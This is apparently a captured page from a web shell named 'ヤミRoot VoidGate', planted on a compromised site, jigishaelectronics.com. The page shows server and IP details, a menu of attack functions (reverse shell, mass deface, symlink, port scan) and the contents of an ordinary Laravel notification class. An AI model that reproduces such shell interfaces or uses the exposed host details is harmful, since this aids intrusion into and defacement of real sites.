ヤミRoot VoidGate
User / IP
:
216.73.216.219
Host / Server
:
147.79.72.99 / jigishaelectronics.com
System
:
Linux us-bos-web1572.main-hosting.eu 5.14.0-611.38.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Mar 10 17:21:28 EDT 2026 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
u852776893
/
domains
/
jigishaelectronics.com
/
public_html
/
app
/
Notifications
/
Viewing: DbNotification.php
<?php namespace App\Notifications; use Illuminate\Notifications\Notification; class DbNotification extends Notification { public function send($notifiable, $notificationData) { $notification_id= $notificationData->id; $contents = $notificationData->data; $className = $notificationData->className; $notifiableClass= new $notificationData->className($contents); $notifyData = $notifiableClass->toArray($notifiable); $notificationTypeID = $notifyData['notification_type_id']; $data = $notifyData['data']; unset($notifyData); return $notifiable->routeNotificationFor('database')->create([ 'id' => $notification_id, 'notification_type_id' => $notificationTypeID, 'notifiable_type'=> \Auth::user()->id, 'type' => $className, 'data' => $data, 'read_at' => null, ]); } }
Coded With 💗 by
0x6ick